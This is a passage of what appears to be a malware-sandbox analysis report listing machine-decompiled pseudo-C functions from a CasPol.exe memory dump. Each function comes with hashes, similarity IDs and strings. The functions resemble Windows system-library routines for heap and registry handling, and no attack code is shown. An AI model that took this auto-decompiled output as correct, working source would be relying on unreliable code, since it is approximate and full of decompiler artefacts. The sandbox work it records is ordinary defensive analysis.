                                                                • Instruction ID: 0579f95510c03a9841d28313c01d359dcd6b4f96fcd7d691669e6104c2243552
                                                                • Opcode Fuzzy Hash: 3bab81cb22c670ba8c2558139e2c5177ac26d8abfd67ee5da1f9d1a83d34915d
                                                                • Instruction Fuzzy Hash: 3671AF71904B859BC712DF78C0D02EAFBF1FF9A300F14865AD499A7351D730A585CBA4
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 80%
                                                                			E016F0EA5(void* __ecx, void* __edx) {
                                                                				signed int _v20;
                                                                				char _v24;
                                                                				intOrPtr _v28;
                                                                				unsigned int _v32;
                                                                				signed int _v36;
                                                                				intOrPtr _v40;
                                                                				char _v44;
                                                                				intOrPtr _v64;
                                                                				void* __ebx;
                                                                				void* __edi;
                                                                				signed int _t58;
                                                                				unsigned int _t60;
                                                                				intOrPtr _t62;
                                                                				char* _t67;
                                                                				char* _t69;
                                                                				void* _t80;
                                                                				void* _t83;
                                                                				intOrPtr _t93;
                                                                				intOrPtr _t115;
                                                                				char _t117;
                                                                				void* _t120;
                                                                
                                                                				_t83 = __edx;
                                                                				_t117 = 0;
                                                                				_t120 = __ecx;
                                                                				_v44 = 0;
                                                                				if(E016EFF69(__ecx,  &_v44,  &_v32) < 0) {
                                                                					L24:
                                                                					_t109 = _v44;
                                                                					if(_v44 != 0) {
                                                                						E016F1074(_t83, _t120, _t109, _t117, _t117);
                                                                					}
                                                                					L26:
                                                                					return _t117;
                                                                				}
                                                                				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
                                                                				_t5 = _t83 + 1; // 0x1
                                                                				_v36 = _t5 << 0xc;
                                                                				_v40 = _t93;
                                                                				_t58 =  *(_t93 + 0xc) & 0x40000000;
                                                                				asm("sbb ebx, ebx");
                                                                				_t83 = ( ~_t58 & 0x0000003c) + 4;
                                                                				if(_t58 != 0) {
                                                                					_push(0);
                                                                					_push(0x14);
                                                                					_push( &_v24);
                                                                					_push(3);
                                                                					_push(_t93);
                                                                					_push(0xffffffff);
                                                                					_t80 = E01669730();
                                                                					_t115 = _v64;
                                                                					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
                                                                						_push(_t93);
                                                                						E016EA80D(_t115, 1, _v20, _t117);
                                                                						_t83 = 4;
                                                                					}
                                                                				}
                                                                				if(E016EA854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
                                                                					goto L24;
                                                                				}
                                                                				_t60 = _v32;
                                                                				_t97 = (_t60 != 0x100000) + 1;
                                                                				_t83 = (_v44 -  *0x1718b04 >> 0x14) + (_v44 -  *0x1718b04 >> 0x14);
                                                                				_v28 = (_t60 != 0x100000) + 1;
                                                                				_t62 = _t83 + (_t60 >> 0x14) * 2;
                                                                				_v40 = _t62;
                                                                				if(_t83 >= _t62) {
                                                                					L10:
                                                                					asm("lock xadd [eax], ecx");
                                                                					asm("lock xadd [eax], ecx");
                                                                					if(E01647D50() == 0) {
                                                                						_t67 = 0x7ffe0380;
                                                                					} else {
                                                                						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                					}
                                                                					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                                                						E016E138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
                                                                					}
                                                                					if(E01647D50() == 0) {
                                                                						_t69 = 0x7ffe0388;
                                                                					} else {
                                                                						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                                					}
                                                                					if( *_t69 != 0) {
                                                                						E016DFEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
                                                                					}
                                                                					if(( *0x1718724 & 0x00000008) != 0) {
                                                                						E016E52F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
                                                                					}
                                                                					_t117 = _v44;
                                                                					goto L26;
                                                                				}
                                                                				while(E016F15B5(0x1718ae4, _t83, _t97, _t97) >= 0) {
                                                                					_t97 = _v28;
                                                                					_t83 = _t83 + 2;
                                                                					if(_t83 < _v40) {
                                                                						continue;
                                                                					}
                                                                					goto L10;
                                                                				}
                                                                				goto L24;
                                                                			}

                                                                0x00000000

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: `
                                                                • API String ID: 0-2679148245
                                                                • Opcode ID: f4d7f175287be0bb066c2340010f7fdb012ab99dab798cdb7251eea1ac990e0c
                                                                • Instruction ID: 829cfeedf9c29a5831d429f0bc2e8dedaf21c81c6750806468f8d247a39fa4f1
                                                                • Opcode Fuzzy Hash: f4d7f175287be0bb066c2340010f7fdb012ab99dab798cdb7251eea1ac990e0c
                                                                • Instruction Fuzzy Hash: 08519D713043829FD324DF28DD84B1BBBE6EB85754F040A6CFA9697291DB70E805CB62
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 75%
                                                                			E0165F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
                                                                				intOrPtr _v8;
                                                                				intOrPtr _v12;
                                                                				intOrPtr _v16;
                                                                				char* _v20;
                                                                				intOrPtr _v24;
                                                                				char _v28;
                                                                				intOrPtr _v32;
                                                                				char _v36;
                                                                				char _v44;
                                                                				char _v52;
                                                                				intOrPtr _v56;
                                                                				char _v60;
                                                                				intOrPtr _v72;
                                                                				void* _t51;
                                                                				void* _t58;
                                                                				signed short _t82;
                                                                				short _t84;
                                                                				signed int _t91;
                                                                				signed int _t100;
                                                                				signed short* _t103;
                                                                				void* _t108;
                                                                				intOrPtr* _t109;
                                                                
                                                                				_t103 = __ecx;
                                                                				_t82 = __edx;
                                                                				_t51 = E01644120(0, __ecx, 0,  &_v52, 0, 0, 0);
                                                                				if(_t51 >= 0) {
                                                                					_push(0x21);
                                                                					_push(3);
                                                                					_v56 =  *0x7ffe02dc;
                                                                					_v20 =  &_v52;
                                                                					_push( &_v44);
                                                                					_v28 = 0x18;
                                                                					_push( &_v28);
                                                                					_push(0x100020);
                                                                					_v24 = 0;
                                                                					_push( &_v60);
                                                                					_v16 = 0x40;
                                                                					_v12 = 0;
                                                                					_v8 = 0;
                                                                					_t58 = E01669830();
                                                                					_t87 =  *[fs:0x30];
                                                                					_t108 = _t58;
                                                                					L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
                                                                					if(_t108 < 0) {
                                                                						L11:
                                                                						_t51 = _t108;
                                                                					} else {
                                                                						_push(4);
                                                                						_push(8);
                                                                						_push( &_v36);
                                                                						_push( &_v44);
                                                                						_push(_v60);
                                                                						_t108 = E01669990();
                                                                						if(_t108 < 0) {
                                                                							L10:
                                                                							_push(_v60);
                                                                							E016695D0();
                                                                							goto L11;
                                                                						} else {
                                                                							_t109 = L01644620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
                                                                							if(_t109 == 0) {
                                                                								_t108 = 0xc0000017;
                                                                								goto L10;
                                                                							} else {
                                                                								_t21 = _t109 + 0x18; // 0x18
                                                                								 *((intOrPtr*)(_t109 + 4)) = _v60;
                                                                								 *_t109 = 1;
                                                                								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
                                                                								 *(_t109 + 0xe) = _t82;
                                                                								 *((intOrPtr*)(_t109 + 8)) = _v56;
                                                                								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
                                                                								E0166F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
                                                                								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                                                                								 *((short*)(_t109 + 0xc)) =  *_t103;
                                                                								_t91 =  *_t103 & 0x0000ffff;
                                                                								_t100 = _t91 & 0xfffffffe;
                                                                								_t84 = 0x5c;
                                                                								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
                                                                									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
                                                                										_push(_v60);
                                                                										E016695D0();
                                                                										L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
                                                                										_t51 = 0xc0000106;
                                                                									} else {
                                                                										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
                                                                										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                                                                										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
                                                                										goto L5;
                                                                									}
                                                                								} else {
                                                                									L5:
                                                                									 *_a4 = _t109;
                                                                									_t51 = 0;
                                                                								}
                                                                							}
                                                                						}
                                                                					}
                                                                				}
                                                                				return _t51;
                                                                			}

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: @
                                                                • API String ID: 0-2766056989
                                                                • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                • Instruction ID: e08b409f409e7132bbdf080632c2292c18c6b2e95213126d04cc9f0440189dbe
                                                                • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                • Instruction Fuzzy Hash: 66517A71504711AFC320DF69C840A6BBBF9FF48750F00892EFA9597690E7B4E904CBA5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 75%
                                                                			E016A3540(intOrPtr _a4) {
                                                                				signed int _v12;
                                                                				intOrPtr _v88;
                                                                				intOrPtr _v92;
                                                                				char _v96;
                                                                				char _v352;
                                                                				char _v1072;
                                                                				intOrPtr _v1140;
                                                                				intOrPtr _v1148;
                                                                				char _v1152;
                                                                				char _v1156;
                                                                				char _v1160;
                                                                				char _v1164;
                                                                				char _v1168;
                                                                				char* _v1172;
                                                                				short _v1174;
                                                                				char _v1176;
                                                                				char _v1180;
                                                                				char _v1192;
                                                                				void* __ebx;
                                                                				void* __edi;
                                                                				void* __esi;
                                                                				void* __ebp;
                                                                				short _t41;
                                                                				short _t42;
                                                                				intOrPtr _t80;
                                                                				intOrPtr _t81;
                                                                				signed int _t82;
                                                                				void* _t83;
                                                                
                                                                				_v12 =  *0x171d360 ^ _t82;
                                                                				_t41 = 0x14;
                                                                				_v1176 = _t41;
                                                                				_t42 = 0x16;
                                                                				_v1174 = _t42;
                                                                				_v1164 = 0x100;
                                                                				_v1172 = L"BinaryHash";
                                                                				_t81 = E01660BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
                                                                				if(_t81 < 0) {
                                                                					L11:
                                                                					_t75 = _t81;
                                                                					E016A3706(0, _t81, _t79, _t80);
                                                                					L12:
                                                                					if(_a4 != 0xc000047f) {
                                                                						E0166FA60( &_v1152, 0, 0x50);
                                                                						_v1152 = 0x60c201e;
                                                                						_v1148 = 1;
                                                                						_v1140 = E016A3540;
                                                                						E0166FA60( &_v1072, 0, 0x2cc);
                                                                						_push( &_v1072);
                                                                						E0167DDD0( &_v1072, _t75, _t79, _t80, _t81);
                                                                						E016B0C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
                                                                						_push(_v1152);
                                                                						_push(0xffffffff);
                                                                						E016697C0();
                                                                					}
                                                                					return E0166B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
                                                                				}
                                                                				_t79 =  &_v352;
                                                                				_t81 = E016A3971(0, _a4,  &_v352,  &_v1156);
                                                                				if(_t81 < 0) {
                                                                					goto L11;
                                                                				}
                                                                				_t75 = _v1156;
                                                                				_t79 =  &_v1160;
                                                                				_t81 = E016A3884(_v1156,  &_v1160,  &_v1168);
                                                                				if(_t81 >= 0) {
                                                                					_t80 = _v1160;
                                                                					E0166FA60( &_v96, 0, 0x50);
                                                                					_t83 = _t83 + 0xc;
                                                                					_push( &_v1180);
                                                                					_push(0x50);
                                                                					_push( &_v96);
                                                                					_push(2);
                                                                					_push( &_v1176);
                                                                					_push(_v1156);
                                                                					_t81 = E01669650();
                                                                					if(_t81 >= 0) {
                                                                						if(_v92 != 3 || _v88 == 0) {
                                                                							_t81 = 0xc000090b;
                                                                						}
                                                                						if(_t81 >= 0) {
                                                                							_t75 = _a4;
                                                                							_t79 =  &_v352;
                                                                							E016A3787(_a4,  &_v352, _t80);
                                                                						}
                                                                					}
                                                                					L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
                                                                				}
                                                                				_push(_v1156);
                                                                				E016695D0();
                                                                				if(_t81 >= 0) {
                                                                					goto L12;
                                                                				} else {
                                                                					goto L11;
                                                                				}
                                                                			}

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: BinaryHash
                                                                • API String ID: 0-2202222882
                                                                • Opcode ID: c846e8069ebf9da890be95773df122c91691fa26a0bcec34dd6be6971c48b235
                                                                • Instruction ID: 2f63872e68631eb02eb3ab39ce6539a402fca154bbf0f9d172c23d483a71750c
                                                                • Opcode Fuzzy Hash: c846e8069ebf9da890be95773df122c91691fa26a0bcec34dd6be6971c48b235
                                                                • Instruction Fuzzy Hash: 614134B2D0052D9BDB21DA54CC85FEEB77DAB54714F4045E9EA09AB240DB309E88CF98
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 71%
                                                                			E016F05AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
                                                                				signed int _v20;
                                                                				char _v24;
                                                                				signed int _v28;
                                                                				char _v32;
                                                                				signed int _v36;
                                                                				intOrPtr _v40;
                                                                				void* __ebx;
                                                                				void* _t35;
                                                                				signed int _t42;
                                                                				char* _t48;
                                                                				signed int _t59;
                                                                				signed char _t61;
                                                                				signed int* _t79;
                                                                				void* _t88;
                                                                
                                                                				_v28 = __edx;
                                                                				_t79 = __ecx;
                                                                				if(E016F07DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
                                                                					L13:
                                                                					_t35 = 0;
                                                                					L14:
                                                                					return _t35;
                                                                				}
                                                                				_t61 = __ecx[1];
                                                                				_t59 = __ecx[0xf];
                                                                				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
                                                                				_v36 = _a8 << 0xc;
                                                                				_t42 =  *(_t59 + 0xc) & 0x40000000;
                                                                				asm("sbb esi, esi");
                                                                				_t88 = ( ~_t42 & 0x0000003c) + 4;
                                                                				if(_t42 != 0) {
                                                                					_push(0);
                                                                					_push(0x14);
                                                                					_push( &_v24);
                                                                					_push(3);
                                                                					_push(_t59);
                                                                					_push(0xffffffff);
                                                                					if(E01669730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
                                                                						_push(_t61);
                                                                						E016EA80D(_t59, 1, _v20, 0);
                                                                						_t88 = 4;
                                                                					}
                                                                				}
                                                                				_t35 = E016EA854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
                                                                				if(_t35 < 0) {
                                                                					goto L14;
                                                                				}
                                                                				E016F1293(_t79, _v40, E016F07DF(_t79, _v28,  &_a4,  &_a8, 1));
                                                                				if(E01647D50() == 0) {
                                                                					_t48 = 0x7ffe0380;
                                                                				} else {
                                                                					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                				}
                                                                				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                                                					E016E138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
                                                                				}
                                                                				goto L13;
                                                                			}


















                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: `
                                                                • API String ID: 0-2679148245
                                                                • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                • Instruction ID: 245c6719428f28e56a69c1e42f8b9b6f100ffd6d3c6d2fcc6ec222b0f5e0ef1f
                                                                • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                • Instruction Fuzzy Hash: 4D31F132300356ABE720DE28CC84F9B7BDAEB84754F14422DFB589B281D770E904CB91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 72%
                                                                			E016A3884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
                                                                				char _v8;
                                                                				intOrPtr _v12;
                                                                				intOrPtr* _v16;
                                                                				char* _v20;
                                                                				short _v22;
                                                                				char _v24;
                                                                				intOrPtr _t38;
                                                                				short _t40;
                                                                				short _t41;
                                                                				void* _t44;
                                                                				intOrPtr _t47;
                                                                				void* _t48;
                                                                
                                                                				_v16 = __edx;
                                                                				_t40 = 0x14;
                                                                				_v24 = _t40;
                                                                				_t41 = 0x16;
                                                                				_v22 = _t41;
                                                                				_t38 = 0;
                                                                				_v12 = __ecx;
                                                                				_push( &_v8);
                                                                				_push(0);
                                                                				_push(0);
                                                                				_push(2);
                                                                				_t43 =  &_v24;
                                                                				_v20 = L"BinaryName";
                                                                				_push( &_v24);
                                                                				_push(__ecx);
                                                                				_t47 = 0;
                                                                				_t48 = E01669650();
                                                                				if(_t48 >= 0) {
                                                                					_t48 = 0xc000090b;
                                                                				}
                                                                				if(_t48 != 0xc0000023) {
                                                                					_t44 = 0;
                                                                					L13:
                                                                					if(_t48 < 0) {
                                                                						L16:
                                                                						if(_t47 != 0) {
                                                                							L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
                                                                						}
                                                                						L18:
                                                                						return _t48;
                                                                					}
                                                                					 *_v16 = _t38;
                                                                					 *_a4 = _t47;
                                                                					goto L18;
                                                                				}
                                                                				_t47 = L01644620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
                                                                				if(_t47 != 0) {
                                                                					_push( &_v8);
                                                                					_push(_v8);
                                                                					_push(_t47);
                                                                					_push(2);
                                                                					_push( &_v24);
                                                                					_push(_v12);
                                                                					_t48 = E01669650();
                                                                					if(_t48 < 0) {
                                                                						_t44 = 0;
                                                                						goto L16;
                                                                					}
                                                                					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
                                                                						_t48 = 0xc000090b;
                                                                					}
                                                                					_t44 = 0;
                                                                					if(_t48 < 0) {
                                                                						goto L16;
                                                                					} else {
                                                                						_t17 = _t47 + 0xc; // 0xc
                                                                						_t38 = _t17;
                                                                						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
                                                                							_t48 = 0xc000090b;
                                                                						}
                                                                						goto L13;
                                                                					}
                                                                				}
                                                                				_t48 = _t48 + 0xfffffff4;
                                                                				goto L18;
                                                                			}
















                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: BinaryName
                                                                • API String ID: 0-215506332
                                                                • Opcode ID: 7ac3edfb7611abc995b1b57093c6ef743e4675721f149c2e6ea820f5d7b2da92
                                                                • Instruction ID: 106b92232dbf05dd02ad048398bd4c778d4177bc123a79df8a72b06f98114b20
                                                                • Opcode Fuzzy Hash: 7ac3edfb7611abc995b1b57093c6ef743e4675721f149c2e6ea820f5d7b2da92
                                                                • Instruction Fuzzy Hash: E531E33290061AAFEB16DA58CD45E7BFB79FF80B20F414169E914A7391E7309E04CBE0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 33%
                                                                			E0165D294(void* __ecx, char __edx, void* __eflags) {
                                                                				signed int _v8;
                                                                				char _v52;
                                                                				signed int _v56;
                                                                				signed int _v60;
                                                                				intOrPtr _v64;
                                                                				char* _v68;
                                                                				intOrPtr _v72;
                                                                				char _v76;
                                                                				signed int _v84;
                                                                				intOrPtr _v88;
                                                                				char _v92;
                                                                				intOrPtr _v96;
                                                                				intOrPtr _v100;
                                                                				char _v104;
                                                                				char _v105;
                                                                				void* __ebx;
                                                                				void* __edi;
                                                                				void* __esi;
                                                                				signed int _t35;
                                                                				char _t38;
                                                                				signed int _t40;
                                                                				signed int _t44;
                                                                				signed int _t52;
                                                                				void* _t53;
                                                                				void* _t55;
                                                                				void* _t61;
                                                                				intOrPtr _t62;
                                                                				void* _t64;
                                                                				signed int _t65;
                                                                				signed int _t66;
                                                                
                                                                				_t68 = (_t66 & 0xfffffff8) - 0x6c;
                                                                				_v8 =  *0x171d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
                                                                				_v105 = __edx;
                                                                				_push( &_v92);
                                                                				_t52 = 0;
                                                                				_push(0);
                                                                				_push(0);
                                                                				_push( &_v104);
                                                                				_push(0);
                                                                				_t59 = __ecx;
                                                                				_t55 = 2;
                                                                				if(E01644120(_t55, __ecx) < 0) {
                                                                					_t35 = 0;
                                                                					L8:
                                                                					_pop(_t61);
                                                                					_pop(_t64);
                                                                					_pop(_t53);
                                                                					return E0166B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
                                                                				}
                                                                				_v96 = _v100;
                                                                				_t38 = _v92;
                                                                				if(_t38 != 0) {
                                                                					_v104 = _t38;
                                                                					_v100 = _v88;
                                                                					_t40 = _v84;
                                                                				} else {
                                                                					_t40 = 0;
                                                                				}
                                                                				_v72 = _t40;
                                                                				_v68 =  &_v104;
                                                                				_push( &_v52);
                                                                				_v76 = 0x18;
                                                                				_push( &_v76);
                                                                				_v64 = 0x40;
                                                                				_v60 = _t52;
                                                                				_v56 = _t52;
                                                                				_t44 = E016698D0();
                                                                				_t62 = _v88;
                                                                				_t65 = _t44;
                                                                				if(_t62 != 0) {
                                                                					asm("lock xadd [edi], eax");
                                                                					if((_t44 | 0xffffffff) != 0) {
                                                                						goto L4;
                                                                					}
                                                                					_push( *((intOrPtr*)(_t62 + 4)));
                                                                					E016695D0();
                                                                					L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
                                                                					goto L4;
                                                                				} else {
                                                                					L4:
                                                                					L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
                                                                					if(_t65 >= 0) {
                                                                						_t52 = 1;
                                                                					} else {
                                                                						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
                                                                							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
                                                                						}
                                                                					}
                                                                					_t35 = _t52;
                                                                					goto L8;
                                                                				}
                                                                			}


































                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: @
                                                                • API String ID: 0-2766056989
                                                                • Opcode ID: 850afac078ee3a6f97c9d69812550600d45123ce0464df06da0b64440f64b971
                                                                • Instruction ID: 2f1c9c3bf9e0ea4ce3d90b3e62c22aba1c83726b40a4b26e20abaa599a5c9190
                                                                • Opcode Fuzzy Hash: 850afac078ee3a6f97c9d69812550600d45123ce0464df06da0b64440f64b971
                                                                • Instruction Fuzzy Hash: 5F319EB1509305DFC761DF68CC8096BBBE9EB96654F00092EF99483291D735DD05CB92
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 72%
                                                                			E01631B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
                                                                				intOrPtr _v8;
                                                                				char _v16;
                                                                				intOrPtr* _t26;
                                                                				intOrPtr _t29;
                                                                				void* _t30;
                                                                				signed int _t31;
                                                                
                                                                				_t27 = __ecx;
                                                                				_t29 = __edx;
                                                                				_t31 = 0;
                                                                				_v8 = __edx;
                                                                				if(__edx == 0) {
                                                                					L18:
                                                                					_t30 = 0xc000000d;
                                                                					goto L12;
                                                                				} else {
                                                                					_t26 = _a4;
                                                                					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
                                                                						goto L18;
                                                                					} else {
                                                                						E0166BB40(__ecx,  &_v16, __ecx);
                                                                						_push(_t26);
                                                                						_push(0);
                                                                						_push(0);
                                                                						_push(_t29);
                                                                						_push( &_v16);
                                                                						_t30 = E0166A9B0();
                                                                						if(_t30 >= 0) {
                                                                							_t19 =  *_t26;
                                                                							if( *_t26 != 0) {
                                                                								goto L7;
                                                                							} else {
                                                                								 *_a8 =  *_a8 & 0;
                                                                							}
                                                                						} else {
                                                                							if(_t30 != 0xc0000023) {
                                                                								L9:
                                                                								_push(_t26);
                                                                								_push( *_t26);
                                                                								_push(_t31);
                                                                								_push(_v8);
                                                                								_push( &_v16);
                                                                								_t30 = E0166A9B0();
                                                                								if(_t30 < 0) {
                                                                									L12:
                                                                									if(_t31 != 0) {
                                                                										L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
                                                                									}
                                                                								} else {
                                                                									 *_a8 = _t31;
                                                                								}
                                                                							} else {
                                                                								_t19 =  *_t26;
                                                                								if( *_t26 == 0) {
                                                                									_t31 = 0;
                                                                								} else {
                                                                									L7:
                                                                									_t31 = L01644620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
                                                                								}
                                                                								if(_t31 == 0) {
                                                                									_t30 = 0xc0000017;
                                                                								} else {
                                                                									goto L9;
                                                                								}
                                                                							}
                                                                						}
                                                                					}
                                                                				}
                                                                				return _t30;
                                                                			}










                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: WindowsExcludedProcs
                                                                • API String ID: 0-3583428290
                                                                • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                • Instruction ID: fd7e4f718cf20861ba4d24018dceda117bef44e183eb2ea903049b4a0f00732d
                                                                • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                • Instruction Fuzzy Hash: 9C210A7A500129ABDB22AA59CC40F5B7BADEF82650F154525FE149B300DB38DC02D7B0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 100%
                                                                			E0164F716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
                                                                				intOrPtr _t13;
                                                                				intOrPtr _t14;
                                                                				signed int _t16;
                                                                				signed char _t17;
                                                                				intOrPtr _t19;
                                                                				intOrPtr _t21;
                                                                				intOrPtr _t23;
                                                                				intOrPtr* _t25;
                                                                
                                                                				_t25 = _a8;
                                                                				_t17 = __ecx;
                                                                				if(_t25 == 0) {
                                                                					_t19 = 0xc00000f2;
                                                                					L8:
                                                                					return _t19;
                                                                				}
                                                                				if((__ecx & 0xfffffffe) != 0) {
                                                                					_t19 = 0xc00000ef;
                                                                					goto L8;
                                                                				}
                                                                				_t19 = 0;
                                                                				 *_t25 = 0;
                                                                				_t21 = 0;
                                                                				_t23 = "Actx ";
                                                                				if(__edx != 0) {
                                                                					if(__edx == 0xfffffffc) {
                                                                						L21:
                                                                						_t21 = 0x200;
                                                                						L5:
                                                                						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
                                                                						 *_t25 = _t13;
                                                                						L6:
                                                                						if(_t13 == 0) {
                                                                							if((_t17 & 0x00000001) != 0) {
                                                                								 *_t25 = _t23;
                                                                							}
                                                                						}
                                                                						L7:
                                                                						goto L8;
                                                                					}
                                                                					if(__edx == 0xfffffffd) {
                                                                						 *_t25 = _t23;
                                                                						_t13 = _t23;
                                                                						goto L6;
                                                                					}
                                                                					_t13 =  *((intOrPtr*)(__edx + 0x10));
                                                                					 *_t25 = _t13;
                                                                					L14:
                                                                					if(_t21 == 0) {
                                                                						goto L6;
                                                                					}
                                                                					goto L5;
                                                                				}
                                                                				_t14 = _a4;
                                                                				if(_t14 != 0) {
                                                                					_t16 =  *(_t14 + 0x14) & 0x00000007;
                                                                					if(_t16 <= 1) {
                                                                						_t21 = 0x1f8;
                                                                						_t13 = 0;
                                                                						goto L14;
                                                                					}
